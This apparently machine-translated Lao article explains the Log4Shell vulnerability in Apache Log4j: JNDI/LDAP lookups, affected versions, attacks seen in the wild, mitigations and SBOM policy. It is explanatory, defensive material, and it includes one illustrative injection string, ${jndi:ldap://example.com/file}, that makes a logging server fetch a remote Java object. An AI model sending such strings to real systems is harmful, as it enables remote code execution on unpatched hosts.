ສາລະບານ[ເຊື່ອງ][ສະແດງ]
ໃນທ້າຍເດືອນພະຈິກ 2021, ພວກເຮົາໄດ້ເປີດເຜີຍໄພຂົ່ມຂູ່ອັນໃຫຍ່ຫຼວງຕໍ່ຄວາມປອດໄພທາງອິນເຕີເນັດ. ການຂູດຮີດນີ້ອາດຈະສົ່ງຜົນກະທົບຕໍ່ລະບົບຄອມພິວເຕີນັບລ້ານທົ່ວໂລກ.
ນີ້ແມ່ນຄໍາແນະນໍາກ່ຽວກັບຊ່ອງໂຫວ່ຂອງ Log4j ແລະວິທີການທີ່ຖືກມອງຂ້າມຂໍ້ບົກພ່ອງຂອງການອອກແບບທີ່ເຫຼືອໄວ້ຫຼາຍກວ່າ 90% ຂອງບໍລິການຄອມພິວເຕີຂອງໂລກເປີດເພື່ອໂຈມຕີ.
Apache Log4j ເປັນແຫຼ່ງປະໂຫຍດການເຂົ້າສູ່ລະບົບ Java ແຫຼ່ງເປີດທີ່ພັດທະນາໂດຍ Apache Software Foundation. ໃນເບື້ອງຕົ້ນຖືກຂຽນໂດຍ Ceki Gülcüໃນປີ 2001, ປະຈຸບັນນີ້ແມ່ນສ່ວນຫນຶ່ງຂອງ Apache Logging Services, ໂຄງການຂອງ Apache Software Foundation.
ບໍລິສັດຕ່າງໆໃນທົ່ວໂລກໃຊ້ຫ້ອງສະໝຸດ Log4j ເພື່ອເປີດໃຊ້ງານບັນທຶກໃນແອັບພລິເຄຊັນຂອງພວກເຂົາ. ໃນຄວາມເປັນຈິງ, ຫ້ອງສະຫມຸດ Java ແມ່ນມີຢູ່ທົ່ວທຸກແຫ່ງ, ທ່ານສາມາດຊອກຫາມັນຢູ່ໃນແອັບພລິເຄຊັນຈາກ Amazon, Microsoft, Google, ແລະອື່ນໆ.
ຄວາມໂດດເດັ່ນຂອງຫ້ອງສະຫມຸດຫມາຍຄວາມວ່າຂໍ້ບົກພ່ອງທີ່ອາດຈະເກີດຂຶ້ນໃນລະຫັດສາມາດເຮັດໃຫ້ຄອມພິວເຕີຫຼາຍລ້ານເປີດໃຫ້ແຮັກ. ໃນວັນທີ 24 ພະຈິກ 2021, ກ ຄວາມປອດໄພຟັງ ນັກຄົ້ນຄວ້າທີ່ເຮັດວຽກໃຫ້ Alibaba ຄົ້ນພົບຂໍ້ບົກພ່ອງທີ່ຂີ້ຮ້າຍ.
ຊ່ອງໂຫວ່ຂອງ Log4j, ເຊິ່ງເອີ້ນກັນວ່າ Log4Shell, ບໍ່ມີໃຜສັງເກດເຫັນຕັ້ງແຕ່ປີ 2013. ຊ່ອງໂຫວ່ດັ່ງກ່າວອະນຸຍາດໃຫ້ຜູ້ກະທຳທີ່ເປັນອັນຕະລາຍສາມາດແລ່ນລະຫັດໃນລະບົບທີ່ໄດ້ຮັບຜົນກະທົບທີ່ແລ່ນ Log4j. ມັນໄດ້ຖືກເປີດເຜີຍຕໍ່ສາທາລະນະໃນວັນທີ 9 ທັນວາ 2021
ຜູ້ຊ່ຽວຊານດ້ານອຸດສາຫະກໍາໂທຫາ Log4Shell ຂໍ້ບົກພ່ອງ ຊ່ອງໂຫວ່ທີ່ໃຫຍ່ທີ່ສຸດໃນຄວາມຊົງຈໍາທີ່ຜ່ານມາ.
ໃນອາທິດຫຼັງຈາກການພິມເຜີຍແຜ່ຊ່ອງໂຫວ່, ທີມງານຄວາມປອດໄພທາງອິນເຕີເນັດໄດ້ກວດພົບການໂຈມຕີຫຼາຍລ້ານຄັ້ງ. ນັກຄົ້ນຄວ້າບາງຄົນຍັງສັງເກດເຫັນອັດຕາການໂຈມຕີຫຼາຍກວ່າຫນຶ່ງຮ້ອຍຄັ້ງຕໍ່ນາທີ.
ມັນເຮັດວຽກແນວໃດ?
ເພື່ອເຂົ້າໃຈວ່າເປັນຫຍັງ Log4Shell ເປັນອັນຕະລາຍຫຼາຍ, ພວກເຮົາຈໍາເປັນຕ້ອງເຂົ້າໃຈສິ່ງທີ່ມັນມີຄວາມສາມາດ.
ຊ່ອງໂຫວ່ຂອງ Log4Shell ອະນຸຍາດໃຫ້ປະຕິບັດລະຫັດທີ່ຕົນເອງມັກ, ຊຶ່ງໂດຍພື້ນຖານແລ້ວຫມາຍຄວາມວ່າຜູ້ໂຈມຕີສາມາດດໍາເນີນການຄໍາສັ່ງຫຼືລະຫັດໃດໆໃນເຄື່ອງຈັກເປົ້າຫມາຍ.
ມັນເຮັດສິ່ງນີ້ໄດ້ແນວໃດ?
ກ່ອນອື່ນ ໝົດ, ພວກເຮົາຕ້ອງເຂົ້າໃຈວ່າ JNDI ແມ່ນຫຍັງ.
Java Naming and Directory Interface (JNDI) ແມ່ນການບໍລິການ Java ທີ່ອະນຸຍາດໃຫ້ໂຄງການ Java ຄົ້ນພົບແລະຊອກຫາຂໍ້ມູນແລະຊັບພະຍາກອນໂດຍຜ່ານຊື່. ການບໍລິການໄດເລກະທໍລີເຫຼົ່ານີ້ແມ່ນມີຄວາມສໍາຄັນເພາະວ່າພວກເຂົາສະຫນອງຊຸດບັນທຶກທີ່ມີການຈັດຕັ້ງສໍາລັບນັກພັດທະນາເພື່ອອ້າງອີງໄດ້ງ່າຍໃນເວລາສ້າງແອັບພລິເຄຊັນ.
JNDI ສາມາດໃຊ້ໂປໂຕຄອນຕ່າງໆເພື່ອເຂົ້າເຖິງໄດເລກະທໍລີທີ່ແນ່ນອນ. ຫນຶ່ງໃນໂປໂຕຄອນເຫຼົ່ານີ້ແມ່ນ Lightweight Directory Access Protocol, ຫຼື LDAP.
ເມື່ອບັນທຶກສະຕຣິງ, ບັນທຶກ4j ປະຕິບັດການປ່ຽນສະຕຣິງເມື່ອພວກເຂົາພົບກັບການສະແດງອອກຂອງແບບຟອມ ${prefix:name}
.
ຍົກຕົວຢ່າງ, Text: ${java:version}
ອາດຈະຖືກບັນທຶກເປັນຂໍ້ຄວາມ: Java ເວີຊັ່ນ 1.8.0_65. ປະເພດຂອງການທົດແທນເຫຼົ່ານີ້ແມ່ນມີທົ່ວໄປ.
ພວກເຮົາຍັງສາມາດມີການສະແດງອອກເຊັ່ນ: Text: ${jndi:ldap://example.com/file}
ເຊິ່ງໃຊ້ລະບົບ JNDI ເພື່ອໂຫລດວັດຖຸ Java ຈາກ URL ຜ່ານໂປຣໂຕຄໍ LDAP.
ນີ້ປະສິດທິພາບການໂຫຼດຂໍ້ມູນທີ່ມາຈາກ URL ນັ້ນເຂົ້າໄປໃນເຄື່ອງ. ແຮກເກີທີ່ມີທ່າແຮງສາມາດໂຮດລະຫັດທີ່ເປັນອັນຕະລາຍຢູ່ໃນ URL ສາທາລະນະແລະລໍຖ້າເຄື່ອງຈັກທີ່ໃຊ້ Log4j ເຂົ້າສູ່ລະບົບມັນ.
ເນື່ອງຈາກເນື້ອໃນຂອງຂໍ້ຄວາມບັນທຶກມີຂໍ້ມູນທີ່ຄວບຄຸມໂດຍຜູ້ໃຊ້, ແຮກເກີສາມາດໃສ່ເອກະສານອ້າງອີງ JNDI ຂອງຕົນເອງທີ່ຊີ້ໃຫ້ເຫັນເຖິງເຄື່ອງແມ່ຂ່າຍ LDAP ທີ່ພວກເຂົາຄວບຄຸມ. ເຊີບເວີ LDAP ເຫຼົ່ານີ້ສາມາດເຕັມໄປດ້ວຍວັດຖຸ Java ທີ່ເປັນອັນຕະລາຍທີ່ JNDI ສາມາດປະຕິບັດໄດ້ໂດຍຜ່ານຊ່ອງໂຫວ່.
ສິ່ງທີ່ເຮັດໃຫ້ສິ່ງດັ່ງກ່າວຮ້າຍແຮງກວ່າເກົ່າແມ່ນວ່າມັນບໍ່ສໍາຄັນວ່າແອັບພລິເຄຊັນເປັນຝ່າຍເຊີຟເວີຫຼືແອັບພລິເຄຊັນຂ້າງລູກຄ້າ.
ຕາບໃດທີ່ມີວິທີການໃຫ້ຜູ້ຕັດໄມ້ອ່ານລະຫັດທີ່ເປັນອັນຕະລາຍຂອງຜູ້ໂຈມຕີ, ແອັບພລິເຄຊັນຍັງເປີດໃຫ້ໃຊ້ການຂູດຮີດ.
ຜູ້ທີ່ຖືກກະທົບ?
ຊ່ອງໂຫວ່ມີຜົນຕໍ່ລະບົບ ແລະບໍລິການທັງໝົດທີ່ໃຊ້ APache Log4j, ໂດຍມີເວີຊັ່ນ 2.0 ເຖິງ ແລະ ລວມທັງ 2.14.1.
ຜູ້ຊ່ຽວຊານດ້ານຄວາມປອດໄພຫຼາຍຄົນໃຫ້ຄໍາແນະນໍາວ່າຊ່ອງໂຫວ່ອາດຈະສົ່ງຜົນກະທົບຕໍ່ຄໍາຮ້ອງສະຫມັກຈໍານວນຫນຶ່ງທີ່ໃຊ້ Java.
ຂໍ້ບົກຜ່ອງໄດ້ຖືກຄົ້ນພົບຄັ້ງທໍາອິດໃນວິດີໂອເກມ Minecraft ທີ່ເປັນເຈົ້າຂອງ Microsoft. Microsoft ໄດ້ຮຽກຮ້ອງໃຫ້ຜູ້ໃຊ້ຂອງພວກເຂົາຍົກລະດັບຊອບແວ Minecraft ສະບັບ Java ຂອງພວກເຂົາເພື່ອປ້ອງກັນຄວາມສ່ຽງໃດໆ.
Jen Easterly, ຜູ້ອໍານວຍການອົງການຄວາມປອດໄພ Cybersecurity ແລະໂຄງສ້າງພື້ນຖານ (CISA) ກ່າວວ່າຜູ້ຂາຍມີ ຄວາມຮັບຜິດຊອບທີ່ສໍາຄັນ ເພື່ອປ້ອງກັນຜູ້ໃຊ້ສຸດທ້າຍຈາກຜູ້ກະທຳຮ້າຍທີ່ສວຍໃຊ້ຊ່ອງໂຫວ່ນີ້.
"ຜູ້ຂາຍຄວນຕິດຕໍ່ສື່ສານກັບລູກຄ້າຂອງພວກເຂົາເພື່ອຮັບປະກັນວ່າຜູ້ໃຊ້ສຸດທ້າຍຮູ້ວ່າຜະລິດຕະພັນຂອງພວກເຂົາມີຈຸດອ່ອນນີ້ແລະຄວນໃຫ້ຄວາມສໍາຄັນກັບການປັບປຸງຊອບແວ."
ລາຍງານວ່າ ການໂຈມຕີໄດ້ເລີ້ມຂຶ້ນແລ້ວ. Symantec, ບໍລິສັດທີ່ສະຫນອງຊອບແວຄວາມປອດໄພທາງອິນເຕີເນັດ, ໄດ້ສັງເກດເຫັນຈໍານວນຄໍາຮ້ອງຂໍການໂຈມຕີທີ່ຫຼາກຫຼາຍ.
ນີ້ແມ່ນບາງຕົວຢ່າງຂອງປະເພດຂອງການໂຈມຕີທີ່ນັກຄົ້ນຄວ້າໄດ້ກວດພົບ:
- botnets
Botnets ແມ່ນເຄືອຂ່າຍຂອງຄອມພິວເຕີທີ່ຢູ່ພາຍໃຕ້ການຄວບຄຸມຂອງຝ່າຍໂຈມຕີດຽວ. ພວກເຂົາຊ່ວຍປະຕິບັດການໂຈມຕີ DDoS, ລັກຂໍ້ມູນ, ແລະການຫລອກລວງອື່ນໆ. ນັກຄົ້ນຄວ້າໄດ້ສັງເກດເຫັນ Muhstik botnet ໃນ Shell scripts ທີ່ດາວໂຫລດມາຈາກ Log4j exploit.
- XMRig Miner Trojan
XMRig ເປັນຜູ້ຂຸດຄົ້ນ cryptocurrency ແຫຼ່ງເປີດທີ່ໃຊ້ CPU ເພື່ອຂຸດຄົ້ນໂທເຄັນ Monero. Cybercriminals ສາມາດຕິດຕັ້ງ XMRig ໃນອຸປະກອນຂອງປະຊາຊົນເພື່ອໃຫ້ເຂົາເຈົ້າສາມາດນໍາໃຊ້ພະລັງງານປະມວນຜົນຂອງເຂົາເຈົ້າໂດຍບໍ່ມີການຄວາມຮູ້ຂອງເຂົາເຈົ້າ.
- Khonsari Ransomware
Ransomware ຫມາຍເຖິງຮູບແບບຂອງ malware ທີ່ອອກແບບມາເພື່ອ ເຂົ້າລະຫັດໄຟລ໌ ໃນຄອມພິວເຕີ. ຫຼັງຈາກນັ້ນ, ຜູ້ໂຈມຕີສາມາດຮຽກຮ້ອງໃຫ້ມີການຈ່າຍເງິນເພື່ອແລກປ່ຽນກັບການໃຫ້ການເຂົ້າເຖິງໄຟລ໌ທີ່ຖືກເຂົ້າລະຫັດຄືນ. ນັກຄົ້ນຄວ້າໄດ້ຄົ້ນພົບ ransomware Khonsari ໃນການໂຈມຕີ Log4Shell. ພວກເຂົາແນເປົ້າໃສ່ເຊີບເວີ Windows ແລະໃຊ້ກອບ .NET.
ມີຫຍັງເກີດຂຶ້ນຕໍ່ໄປ?
ຜູ້ຊ່ຽວຊານຄາດຄະເນວ່າມັນອາດຈະໃຊ້ເວລາຫຼາຍເດືອນຫຼືບາງທີແມ່ນປີເພື່ອແກ້ໄຂຄວາມວຸ່ນວາຍທີ່ເກີດຂື້ນໂດຍຊ່ອງໂຫວ່ Log4J ຢ່າງສົມບູນ.
ຂະບວນການນີ້ກ່ຽວຂ້ອງກັບການປັບປຸງທຸກລະບົບທີ່ໄດ້ຮັບຜົນກະທົບດ້ວຍສະບັບ patched. ເຖິງແມ່ນວ່າລະບົບທັງຫມົດເຫຼົ່ານີ້ຖືກ patched, ຍັງມີໄພຂົ່ມຂູ່ຂອງ backdoors ທີ່ເປັນໄປໄດ້ທີ່ແຮກເກີອາດຈະໄດ້ເພີ່ມໃສ່ປ່ອງຢ້ຽມທີ່ເຄື່ອງແມ່ຂ່າຍໄດ້ຖືກເປີດສໍາລັບການໂຈມຕີ.
ຫຼາຍຄົນ ການແກ້ໄຂແລະການຫຼຸດຜ່ອນ ມີຢູ່ເພື່ອປ້ອງກັນບໍ່ໃຫ້ແອັບພລິເຄຊັນຖືກຂູດຮີດໂດຍແມງໄມ້ນີ້. Log4j ເວີຊັນ 2.15.0-rc1 ໃໝ່ໄດ້ປ່ຽນການຕັ້ງຄ່າຕ່າງໆເພື່ອຫຼຸດຜ່ອນຊ່ອງໂຫວ່ນີ້.
ຄຸນສົມບັດທັງໝົດທີ່ໃຊ້ JNDI ຈະຖືກປິດໃຊ້ງານໂດຍຄ່າເລີ່ມຕົ້ນ ແລະການຊອກຫາທາງໄກກໍຖືກຈຳກັດໄວ້ເຊັ່ນກັນ. ການປິດຄຸນສົມບັດການຊອກຫາຢູ່ໃນການຕິດຕັ້ງ Log4j ຂອງເຈົ້າຈະຊ່ວຍຫຼຸດຄວາມສ່ຽງຕໍ່ການຂູດຮີດທີ່ເປັນໄປໄດ້.
ພາຍນອກ Log4j, ຍັງມີຄວາມຕ້ອງການແຜນການທີ່ກວ້າງຂວາງເພື່ອປ້ອງກັນການຂຸດຄົ້ນແຫຼ່ງເປີດ.
ໃນຕົ້ນເດືອນພຶດສະພາ, ທຳນຽບຂາວໄດ້ອອກຖະແຫຼງການສະບັບໜຶ່ງ ຄຳ ສັ່ງບໍລິຫານ ເຊິ່ງແນໃສ່ປັບປຸງຄວາມປອດໄພທາງອິນເຕີເນັດແຫ່ງຊາດ. ມັນປະກອບມີການສະຫນອງສໍາລັບບັນຊີລາຍການຊອບແວ (SBOM) ເຊິ່ງເປັນສິ່ງຈໍາເປັນເອກະສານທີ່ເປັນທາງການທີ່ມີບັນຊີລາຍຊື່ຂອງທຸກໆລາຍການທີ່ຈໍາເປັນເພື່ອສ້າງຄໍາຮ້ອງສະຫມັກ.
ນີ້ປະກອບມີພາກສ່ວນເຊັ່ນ: Open source packages, dependencies, ແລະ APIs ທີ່ໃຊ້ສໍາລັບການພັດທະນາ. ເຖິງແມ່ນວ່າແນວຄວາມຄິດຂອງ SBOMs ມີປະໂຫຍດຕໍ່ຄວາມໂປ່ງໃສ, ມັນກໍ່ຈະຊ່ວຍໃຫ້ຜູ້ບໍລິໂພກໄດ້ບໍ?
ການອັບເກຣດການເພິ່ງພາອາໄສອາດຈະຫຍຸ້ງຍາກເກີນໄປ. ບໍລິສັດພຽງແຕ່ສາມາດເລືອກທີ່ຈະຈ່າຍຄ່າປັບໄຫມແທນທີ່ຈະມີຄວາມສ່ຽງທີ່ຈະເສຍເວລາພິເສດໃນການຊອກຫາຊຸດທາງເລືອກ. ບາງທີ SBOMs ເຫຼົ່ານີ້ຈະເປັນປະໂຫຍດພຽງແຕ່ຖ້າພວກເຂົາ ຂອບເຂດ ຖືກຈຳກັດຕື່ມອີກ.
ສະຫຼຸບ
ບັນຫາ Log4j ແມ່ນຫຼາຍກ່ວາພຽງແຕ່ບັນຫາດ້ານວິຊາການສໍາລັບອົງການຈັດຕັ້ງ.
ຜູ້ນໍາທຸລະກິດຕ້ອງຮູ້ເຖິງຄວາມສ່ຽງທີ່ອາດຈະເກີດຂື້ນໃນເວລາທີ່ເຄື່ອງແມ່ຂ່າຍ, ຜະລິດຕະພັນ, ຫຼືການບໍລິການຂອງພວກເຂົາອີງໃສ່ລະຫັດທີ່ເຂົາເຈົ້າບໍ່ໄດ້ຮັກສາໄວ້.
ການເອື່ອຍອີງໃສ່ແຫຼ່ງເປີດ ແລະແອັບພລິເຄຊັນພາກສ່ວນທີສາມສະເໝີມາພ້ອມກັບຄວາມສ່ຽງບາງຢ່າງ. ບໍລິສັດຄວນພິຈາລະນາປະຕິບັດຍຸດທະສາດການຫຼຸດຜ່ອນຄວາມສ່ຽງກ່ອນທີ່ໄພຂົ່ມຂູ່ໃຫມ່ຈະເກີດຂື້ນ.
ສ່ວນໃຫຍ່ຂອງເວັບແມ່ນອີງໃສ່ຊອບແວ open-source ທີ່ຮັກສາໄວ້ໂດຍອາສາສະຫມັກຫຼາຍພັນຄົນໃນທົ່ວໂລກ.
ຖ້າພວກເຮົາຕ້ອງການຮັກສາເວັບໄຊທ໌ເປັນບ່ອນທີ່ປອດໄພ, ລັດຖະບານແລະບໍລິສັດຄວນລົງທຶນໃນການສະຫນອງທຶນໃນຄວາມພະຍາຍາມຂອງແຫຼ່ງເປີດແລະອົງການຄວາມປອດໄພທາງອິນເຕີເນັດເຊັ່ນ: CISA.
ອອກຈາກ Reply ເປັນ